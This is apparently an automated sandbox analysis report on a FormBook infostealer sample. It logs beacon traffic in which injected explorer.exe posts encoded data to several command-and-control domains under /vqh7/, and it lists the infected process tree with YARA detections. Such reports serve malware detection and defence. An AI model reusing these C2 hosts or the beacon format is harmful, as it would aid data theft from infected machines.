                                                              Server: Apache/2.4.54 (Unix)
                                                              Location: https://www.krankenzusatz.net/vqh7/?u1ua=y31BrajEErp1x9Bd7G4Dy3nypbIU9ptiP4J7BVkyXNwnX592eZZvtl/Of6ew4EgbD4Si63saT16r7LNb7qf0+U/tSn+rF9O8jw==&4sHXq=qmMaHdA-N1MF
                                                              Content-Length: 372
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.krankenzusatz.net/vqh7/?u1ua=y31BrajEErp1x9Bd7G4Dy3nypbIU9ptiP4J7BVkyXNwnX592eZZvtl/Of6ew4EgbD4Si63saT16r7LNb7qf0+U/tSn+rF9O8jw==&amp;4sHXq=qmMaHdA-N1MF">here</a>.</p></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                              16 | 192.168.2.3 | 49699 | 75.102.22.168 | 80 | C:\Windows\explorer.exe
                                                              Timestamp | kBytes transferred | Direction | Data
                                                              Feb 10, 2023 12:45:54.380230904 CET | 213 | OUT | POST /vqh7/ HTTP/1.1
                                                              Host: www.hotelyeah.top
                                                              Connection: close
                                                              Content-Length: 186
                                                              Cache-Control: no-cache
                                                              Origin: http://www.hotelyeah.top
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Accept: */*
                                                              Referer: http://www.hotelyeah.top/vqh7/
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate
                                                              Data Ascii: u1ua=2BUfm1Xa4-YPIq4Ukov59n7mfpFDv6shHQljtPHhE0V92sg68pKAUTShhqcJrI95zznqpHjAtM9z9rL51WhCaCDUOKfuOLyMXfGxkLomDi(DUOEZSvhmt0~vlOeg(x5wt1JaTx~OYbEPObzmxfBddZr7YhAROJzi2p0LNZ5qLis7rYuTRQ).
                                                              Feb 10, 2023 12:45:54.500844955 CET | 215 | IN | HTTP/1.1 404 Not Found
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 1238
                                                              date: Fri, 10 Feb 2023 11:45:54 GMT
                                                              server: LiteSpeed
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">Lit
                                                              Feb 10, 2023 12:45:54.500895977 CET | 215 | IN |
                                                              Data Ascii: eSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                              17 | 192.168.2.3 | 49700 | 75.102.22.168 | 80 | C:\Windows\explorer.exe
                                                              Timestamp | kBytes transferred | Direction | Data
                                                              Feb 10, 2023 12:45:57.078356981 CET | 221 | OUT | POST /vqh7/ HTTP/1.1
                                                              Host: www.hotelyeah.top
                                                              Connection: close
                                                              Content-Length: 5334
                                                              Cache-Control: no-cache
                                                              Origin: http://www.hotelyeah.top
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Accept: */*
                                                              Referer: http://www.hotelyeah.top/vqh7/
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate
76v4yK4a_UgAnBGbjIWAJGRHhYIZcTXZN9ATp74M4eCk5HWm9TDRbEmW9sUNcX8SNkAkgFnCbFhEq6Vx0TTyEI-Vlvog_XXEPAcl6PTJtwzEmeu8HEavyf5kV~S~QqSkiNP3yNCVUEWMDapmv(HOyne6GJw6TE6s
                                                              Feb 10, 2023 12:45:57.241301060 CET  222                 IN         HTTP/1.1 404 Not Found
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 1238
                                                              date: Fri, 10 Feb 2023 11:45:56 GMT
                                                              server: LiteSpeed
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">Lit
                                                              Feb 10, 2023 12:45:57.241322994 CET  222                 IN
                                                              Data Ascii: eSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                              18          192.168.2.3  49701        75.102.22.168   80                C:\Windows\explorer.exe
                                                              Timestamp                            kBytes transferred  Direction  Data
                                                              Feb 10, 2023 12:45:59.764292955 CET  223                 OUT        GET /vqh7/?u1ua=7D8/lBzEw/wsNost5L+U4EiZQqgBuaFyWQoeh5HgHjAV29hA+52JaGKa2IA6i84+uhqZsECRoLQWyY+/mGhgcTKrDMHQPN2qJA==&4sHXq=qmMaHdA-N1MF HTTP/1.1
                                                              Host: www.hotelyeah.top
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Feb 10, 2023 12:45:59.927357912 CET  224                 IN         HTTP/1.1 404 Not Found
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 1238
                                                              date: Fri, 10 Feb 2023 11:45:59 GMT
                                                              server: LiteSpeed
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">Lit
                                                              Feb 10, 2023 12:45:59.927386999 CET  225                 IN
                                                              Data Ascii: eSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                              Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
                                                              19          192.168.2.3  49702        91.195.240.117   80                C:\Windows\explorer.exe
                                                              Timestamp                            kBytes transferred  Direction  Data
                                                              Feb 10, 2023 12:46:12.221292973 CET  227                 OUT        POST /vqh7/ HTTP/1.1
                                                              Host: www.nativealternatives.com
                                                              Connection: close
                                                              Content-Length: 186
                                                              Cache-Control: no-cache
                                                              Origin: http://www.nativealternatives.com
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Accept: */*
                                                              Referer: http://www.nativealternatives.com/vqh7/
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate
                                                              Data Ascii: u1ua=bYNcd61QtJbYWXthFSrsrIDx8Lbu5Vss1UrO1_sLor6-JHyfSqWofMbClwlzvzVbftoVve5Gn-Dv~PnQVqZL0ojHpPSM9grpbinrpOc8CXzwR6vTerSOuhjlpcbjYEfpwISPKJXcYUVB0B1EZdEMfbQ0t1x1zO0rvrR7xBUhTkXk0NP5wg).
                                                              Feb 10, 2023 12:46:12.240909100 CET  227                 IN         HTTP/1.1 403 Forbidden
                                                              date: Fri, 10 Feb 2023 11:46:12 GMT
                                                              content-type: text/html
                                                              transfer-encoding: chunked
                                                              vary: Accept-Encoding
                                                              server: NginX
                                                              content-encoding: gzip
                                                              connection: close
                                                              Data Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a


                                                              Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
                                                              2           192.168.2.3  49685        199.192.22.198   80                C:\Windows\explorer.exe
                                                              Timestamp                            kBytes transferred  Direction  Data
                                                              Feb 10, 2023 12:45:03.525937080 CET  133                 OUT        POST /vqh7/ HTTP/1.1
                                                              Host: www.specigain.online
                                                              Connection: close
                                                              Content-Length: 5334
                                                              Cache-Control: no-cache
                                                              Origin: http://www.specigain.online
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Accept: */*
                                                              Referer: http://www.specigain.online/vqh7/
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate
                                                              Feb 10, 2023 12:45:03.893599033 CET  134                 IN         HTTP/1.1 404 Not Found
                                                              Date: Fri, 10 Feb 2023 11:45:03 GMT
                                                              Server: Apache
                                                              Content-Length: 570
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>


                                                              Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
                                                              20          192.168.2.3  49703        91.195.240.117   80                C:\Windows\explorer.exe
                                                              Timestamp                            kBytes transferred  Direction  Data
                                                              Feb 10, 2023 12:46:24.649605036 CET  233                 OUT        POST /vqh7/ HTTP/1.1
                                                              Host: www.nativealternatives.com
                                                              Connection: close
                                                              Content-Length: 5334
                                                              Cache-Control: no-cache
                                                              Origin: http://www.nativealternatives.com
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Accept: */*
                                                              Referer: http://www.nativealternatives.com/vqh7/
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate
                                                              Feb 10, 2023 12:46:24.670975924 CET  234                 IN         HTTP/1.1 403 Forbidden
                                                              date: Fri, 10 Feb 2023 11:46:24 GMT
                                                              content-type: text/html
                                                              transfer-encoding: chunked
                                                              vary: Accept-Encoding
                                                              server: NginX
                                                              content-encoding: gzip
                                                              connection: close


                                                              Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
                                                              3           192.168.2.3  49686        199.192.22.198   80                C:\Windows\explorer.exe
                                                              Timestamp                            kBytes transferred  Direction  Data
                                                              Feb 10, 2023 12:45:06.220357895 CET  135                 OUT        GET /vqh7/?u1ua=t1pNaIlB57t+2Br13rtd5l5qJnwIoRZHcaYdKNODTQQHpRjo5OTeCknNVcCO080ObvYdOnMGhI5gsKQpTmmnmrZxModizUJoJg==&4sHXq=qmMaHdA-N1MF HTTP/1.1
                                                              Host: www.specigain.online
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Feb 10, 2023 12:45:06.542025089 CET  135                 IN         HTTP/1.1 404 Not Found
                                                              Date: Fri, 10 Feb 2023 11:45:06 GMT
                                                              Server: Apache
                                                              Content-Length: 570
                                                              Connection: close
                                                              Content-Type: text/html; charset=utf-8
                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>


                                                              Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
                                                              4           192.168.2.3  49687        103.191.208.50   80                C:\Windows\explorer.exe
                                                              Timestamp                            kBytes transferred  Direction  Data
                                                              Feb 10, 2023 12:45:11.737200022 CET  137                 OUT        POST /vqh7/ HTTP/1.1
                                                              Host: www.treebarktees.com
                                                              Connection: close
                                                              Content-Length: 186
                                                              Cache-Control: no-cache
                                                              Origin: http://www.treebarktees.com
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Accept: */*
                                                              Referer: http://www.treebarktees.com/vqh7/
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate
                                                              Data Ascii: u1ua=XtPNcEIn~bbV1ftamQ6Y6xooVm0qeNA_oHyHOYgJjznEFivOYaFKnjG7FmLppSgPNyiPBn3WPbmCGJc4ghFldqqEB-7exWn3I4gxwvA49uGMrYel(gTiMWyCPcyb6mvv6yZ7J1B7dKaqEpA-(0aJ0KOpi65x(7r8bd6vkLW4Hkio3wdU(Q).
                                                              Feb 10, 2023 12:45:12.642971992 CET  138                 IN         HTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Fri, 10 Feb 2023 11:45:12 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              x-powered-by: PHP/8.1.15
                                                              x-litespeed-tag: 90d_HTTP.404
                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                              link: <https://treebarktees.com/index.php/wp-json/>; rel="https://api.w.org/"
                                                              x-litespeed-cache-control: no-cache
                                                              content-encoding: gzip
                                                              vary: Accept-Encoding
                                                              x-turbo-charged-by: LiteSpeed


                                                              Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
                                                              5           192.168.2.3  49688        103.191.208.50   80                C:\Windows\explorer.exe
                                                              Timestamp                            kBytes transferred  Direction  Data
                                                              Feb 10, 2023 12:45:14.409955978 CET  161                 OUT        POST /vqh7/ HTTP/1.1
                                                              Host: www.treebarktees.com
                                                              Connection: close
                                                              Content-Length: 5334
                                                              Cache-Control: no-cache
                                                              Origin: http://www.treebarktees.com
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Accept: */*
                                                              Referer: http://www.treebarktees.com/vqh7/
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate
YAnWB0p6GaXTAeXATAqdkbL2OimkmsSmdOMmrZA95ekvLqdobGD(SmNpj4gQg3IL636sTs_wWLxl0z42W1GWr05gtjX2YxbuVUyjf4epNsAUzemRl2NxuBEasy2NQ4o7i4GTnMAIEzyNJlLeRUCCJzGrq3bMsQQ9
                                                              Feb 10, 2023 12:45:15.397419930 CET | 162 | IN | HTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Fri, 10 Feb 2023 11:45:15 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              x-powered-by: PHP/8.1.15
                                                              x-litespeed-tag: 90d_HTTP.404
                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                              link: <https://treebarktees.com/index.php/wp-json/>; rel="https://api.w.org/"
                                                              x-litespeed-cache-control: no-cache
                                                              content-encoding: gzip
                                                              vary: Accept-Encoding
                                                              x-turbo-charged-by: LiteSpeed


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                              6 | 192.168.2.3 | 49689 | 103.191.208.50 | 80 | C:\Windows\explorer.exe
                                                              Timestamp | kBytes transferred | Direction | Data
                                                              Feb 10, 2023 12:45:17.082138062 CET | 180 | OUT | GET /vqh7/?u1ua=avntfzZWwL7S+bFx7xC7yR8pR0BqdKNL+mi6NO8or2/YUjOFXpJJhQb6NE3o2hVXLy/LWl7MJMKHcu5A7Cd4caz4W6nJ0FH5Jw==&4sHXq=qmMaHdA-N1MF HTTP/1.1
                                                              Host: www.treebarktees.com
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Feb 10, 2023 12:45:17.859095097 CET | 180 | IN | HTTP/1.1 301 Moved Permanently
                                                              Server: nginx
                                                              Date: Fri, 10 Feb 2023 11:45:17 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Content-Length: 0
                                                              Connection: close
                                                              x-powered-by: PHP/8.1.15
                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                              x-redirect-by: WordPress
                                                              location: http://treebarktees.com/vqh7/?u1ua=avntfzZWwL7S+bFx7xC7yR8pR0BqdKNL+mi6NO8or2/YUjOFXpJJhQb6NE3o2hVXLy/LWl7MJMKHcu5A7Cd4caz4W6nJ0FH5Jw==&4sHXq=qmMaHdA-N1MF
                                                              x-litespeed-cache: miss
                                                              x-turbo-charged-by: LiteSpeed


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                              7 | 192.168.2.3 | 49690 | 148.251.13.126 | 80 | C:\Windows\explorer.exe
                                                              Timestamp | kBytes transferred | Direction | Data
                                                              Feb 10, 2023 12:45:23.243403912 CET | 181 | OUT | POST /vqh7/ HTTP/1.1
                                                              Host: www.gachthe365.site
                                                              Connection: close
                                                              Content-Length: 186
                                                              Cache-Control: no-cache
                                                              Origin: http://www.gachthe365.site
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Accept: */*
                                                              Referer: http://www.gachthe365.site/vqh7/
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate
                                                              Data Ascii: u1ua=kXA2OWxfPiaikKeZI_yDDG4S6pLIbMCucauSIDe_9w2xneHitxU4MLN3mstRAwpI5lTP09DvwhnytpHDj819ZxtuJxBKU7u8ED84bPQZJlLwCVhX3CZjwugTnpTliUOckPlkKfsyB5VhpGsaz1xTka(bHeKF868xJU37MJnuWyspfI3C1g).
                                                              Feb 10, 2023 12:45:23.277045965 CET | 182 | IN | HTTP/1.1 404 Not Found
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 708
                                                              date: Fri, 10 Feb 2023 11:45:23 GMT
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                              8 | 192.168.2.3 | 49691 | 148.251.13.126 | 80 | C:\Windows\explorer.exe
                                                              Timestamp | kBytes transferred | Direction | Data
                                                              Feb 10, 2023 12:45:25.795381069 CET | 189 | OUT | POST /vqh7/ HTTP/1.1
                                                              Host: www.gachthe365.site
                                                              Connection: close
                                                              Content-Length: 5334
                                                              Cache-Control: no-cache
                                                              Origin: http://www.gachthe365.site
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Accept: */*
                                                              Referer: http://www.gachthe365.site/vqh7/
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate
                                                              Feb 10, 2023 12:45:25.818445921 CET | 190 | IN | HTTP/1.1 404 Not Found
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 708
                                                              date: Fri, 10 Feb 2023 11:45:25 GMT
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                              9 | 192.168.2.3 | 49692 | 148.251.13.126 | 80 | C:\Windows\explorer.exe
                                                              Timestamp | kBytes transferred | Direction | Data
                                                              Feb 10, 2023 12:45:28.335977077 CET | 191 | OUT | GET /vqh7/?u1ua=pVoWNihbCh2zr5CHItakBz03v8qzOfTDGJe3fnCW5FC8ht3krgFCJJZSjJ8fBA0610Gm6f/qx36kmOqdgM55XyI7IXI3QKaXMg==&4sHXq=qmMaHdA-N1MF HTTP/1.1
                                                              Host: www.gachthe365.site
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Feb 10, 2023 12:45:28.359185934 CET | 192 | IN | HTTP/1.1 404 Not Found
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 708
                                                              date: Fri, 10 Feb 2023 11:45:28 GMT
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>



                                                              Target ID:0
                                                              Start time:12:44:08
                                                              Start date:10/02/2023
                                                              Path:C:\Users\user\Desktop\Requisito ordine n. 230210.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Users\user\Desktop\Requisito ordine n. 230210.exe
                                                              Imagebase:0x22275050000
                                                              File size:734720 bytes
                                                              MD5 hash:39F9F9780AFF067B147B7ADFFB960C05
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:low

                                                              Target ID:1
                                                              Start time:12:44:12
                                                              Start date:10/02/2023
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
                                                              Imagebase:0xc10000
                                                              File size:107624 bytes
                                                              MD5 hash:F866FC1C2E928779C7119353C3091F0C
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.312490227.00000000015C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.312490227.00000000015C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.312490227.00000000015C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              Reputation:moderate

                                                              Target ID:2
                                                              Start time:12:44:14
                                                              Start date:10/02/2023
                                                              Path:C:\Windows\explorer.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\Explorer.EXE
                                                              Imagebase:0x7ff69fe90000
                                                              File size:3933184 bytes
                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Target ID:11
                                                              Start time:12:44:31
                                                              Start date:10/02/2023
                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\SysWOW64\svchost.exe
                                                              Imagebase:0x1a0000
                                                              File size:44520 bytes
                                                              MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.521718307.0000000000510000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.521718307.0000000000510000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.521718307.0000000000510000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.523191622.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.523056179.0000000002920000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.523056179.0000000002920000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.523056179.0000000002920000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              Reputation:high

                                                              Target ID:13
                                                              Start time:12:45:29
                                                              Start date:10/02/2023
